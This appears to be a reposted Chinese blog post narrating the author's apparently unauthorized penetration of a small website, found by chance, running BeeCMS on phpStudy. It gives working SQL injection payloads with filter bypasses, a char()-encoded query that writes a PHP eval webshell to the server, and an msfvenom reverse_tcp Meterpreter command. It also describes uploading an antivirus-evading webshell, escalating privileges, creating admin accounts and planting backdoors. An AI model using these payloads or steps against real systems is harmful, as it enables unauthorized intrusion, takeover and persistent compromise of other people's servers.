记一次小网站渗透过程

VSole2022-04-27 06:18:38

一、序言

记录某一次无意点开的一个小网站的渗透过程,幸运的是搭建平台是phpstudy,cms是beecms,beecms有通用漏洞,然后去网上找了资料,成功getshell并获取服务器权限。

二、渗透过程

1. 无意点开一个网站,发现网站比较小,且看起来比较老,然后发现logo没有改,于是乎去百度搜索这个cms,发现有通用漏洞,这里贴一个链接:Beecms 通用漏洞(https://link.csdn.net/?target=https%3A%2F%2Fwww.ohinge.cn%2Fphp%2Fbeescms_sqli.html)

2. 这里运气比较好,没有更改后台地址,还是默认地址/admin/login.php

3. 通过通用漏洞发先后台管理处存在sql注入漏洞,直接输入admin’,然后就会报错,这里用万能密码不能登陆,看来还是得通过上面得通用漏洞来进行注入

4. 可以看到输入payload后,页面返回正常,从而可以判断有sql注入,这里采用双写进行绕过

、、、、、、、、、、、、、、、、、、、、、、、、、、、、、、、、、、、、、、、、、、、、、、、

5. 发现这个注入点后,就有各种各样的注入方式了,通过sql语句写入一句话,sqlmap一把梭,手工注入得到账号密码等等,怎么方便怎么来,这里我把几种方法都写一下,看看那种方法可以

方法一

1.通过post抓包sqlmap一把梭,dump出管理员账号密码,进后台找上传点

2.一把梭,发现并没有,使用脚本也没有绕过

方法二

1.通过burp抓包,写入一句话,payload:admin%27 un union ion selselectect 1,2,3,4, into outfile 'xm.php'#,发现写入失败,前面讲到有防护,这里通过hex编码或者char函数绕过

2.对shell部分进行编码

3.写入shell的payload为:注意:记得在编码转换的时候前面加0x或者直接用unhex函数,但是本次实验用unhex函数一直失败,所以在前面加0x,看到可以写入成功。

ps:这里的写入路径纯属盲猜,运气好,默认目录

4.用蚁剑连接,成功连接,至此getshell完毕,下来就是后渗透阶段,后面会讲

char函数绕过:mysql内置函数char()可以将里面的ascii码转换为字符串,payload为:admin' uni union on selselectect null,null,null,null,char(60, 63, 112, 104, 112, 32, 64, 101, 118, 97, 108, 40, 36, 95, 80, 79, 83, 84, 91, 99, 109, 100, 93, 41, 59, 63, 62) in into outoutfilefile 'C:/phpStudy/WWW/beescms/cmd.php'#


一样成功写入

1.写入成功后,菜刀可以连接,我们访问写入的文件,惊奇的发现竟然有admin,和一串md5码,大胆猜测可能是后台账号和密码,试一下

2.md5解密,wocao,成功登陆,然后就是后台找上传了

三、后渗透

通过whoami查看权限,发现是admin权限,但是不是最高权限,我们要提到最高权限去


方法一

1.通过msf生成木马提权,payload:msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=192.168.1.10 LPORT=4444 -f exe X > shell.exe2.通过蚁剑上传木马,并执行。执行之前打开msf使用模块use exploit/multi/handler,设置相应参数,然后开始监听

2.不知道什么问题,用这个没有成功,那么只能通过大马提权了

方法二

1.上传大马,此处应该有狗或者盾之类的,用的免杀,成功上传

2.访问大马

3.这里提权方式很多,就不细说了,有大马之后很多操作都可以引刃而解了,开放端口,添加账号,留后门。。等等

4.创建admin权限账号之后,登陆服务器

四、一些其他的发现

通过扫描目录,还发现有phpmyadmin,可以爆破,这里我试了下竟然是弱口令,都是root,但是连接不上,只能通过phpmyadmin登陆,发现是低版本的phpstudy搭建的,这里就可以另一种思路,利用日志文件写入一句话getshell

五、总结

1.前台sql注入获取用户名密码,进入后台找上传

2.SQL注入语句写入一句话

3.phpmyadmin一句话getshell

4.上传大马提权

至此,渗透结束。

payloadadmin
本作品采用《CC 协议》,转载必须注明作者和本文链接
记一次网站渗透过程
2022-09-13 08:37:27
前几天记录某一次无意点开的一个小网站的渗透过程,幸运的是搭建平台是phpstudy,cms是beecms,beecms有通用漏洞,然后去网上找了资料,成功getshell并获取服务器权限。
一、序言 记录某一次无意点开的一个小网站的渗透过程,幸运的是搭建平台是phpstudy,cms是beecms,beecms有通用漏洞,然后去网上找了资料,成功getshell并获取服务器权限。 二、渗透过程 1. 无意点开一个网站,发现网站比较小,且看起来比较老,然后发现logo没有改,于是乎去百度搜索这个cms,发现有通用漏洞,这里贴一个链接:Beecms 通用漏洞(https://lin
接着是read_password函数,与read_name函数基本一致。在看最后的password_checker()前,我们用正确密码测试文件,显示段错误。查看password_checker,login与admin的密码比较后,来了个奇葩的有毒打印,接着前面的二级函数终于被调用了。我们需要知道报错原因,gdb调试发现正好是二级指针调用出错。利用思路经过上面的初步分析,我们知道程序在password_checker中调用一个二级指针失败而段错误终止,考虑到canary的存在,srop不可能短期实现。即使我们无法利用这个二级指针getshell,它的存在也会让程序终止。
Jwtear是一款模块化的命令行工具,该工具可以帮助广大研究人员从安全研究的角度来解析、创建和修改JSON Web令牌。?完整的模块化组件:所有的命令都是插件,可以轻松添加新的插件;支持JWS和JWE令牌;提供了易于使用的接口和模版;高灵活性,轻松可扩展新功能;基于生产类库的令牌生成机制。
Jenkins漏洞利用复现
2021-11-17 08:08:12
也可以利用powershell 或者python脚本反弹shell二、CVE-2018-1000861?exploit.py这里要注释下,如果你使用代理的话可以添加,这里只是复现,用不到?另外一个linux写shell的小技巧:echo base64后的木马内容 |base64 -d > 1.js. jsp生成成功四、
某CMS漏洞合集
2023-06-27 16:12:06
2)contorl.php:对$_GET进行全局过滤危险的SQL函数。这个过滤从最简单的角度来说,即mysql<8的情况下,把select禁用了,其实就没办法进行跨表查询,SQL利用造成危害的可能性会大大降低,当然这是一种直接且无需考虑用户体验为原则的暴力做法,点到为止吧。回到web_inc.php,继续阅读,后面吸引我的地方,在于 89 line一处SQL语句的地方。
环境搭建1.项目介绍:本次项目模拟渗透测试人员在授权的情况下,对目标进行渗透测试,从外网打点到内网横向渗透,最终获取整个内网权限。使用弱口令和暴力破解,没有爆破出弱口令用户。
前 言 欢迎各位大佬们给该项目点一个star https://github.com/flipped-aurora/gin-vue-admin/
关于远程代码执行的常用Payload大家好,我是 Ansar Uddin,我是来自孟加拉国的网络安全研究员。这是我的第二篇 Bug 赏金文章。今天的话题都是关于 Rce 的利用。攻击者的能力取决于服务器端解释器的限制。在某些情况下,攻击者可能能够从代码注入升级为命令注入。
VSole
网络安全专家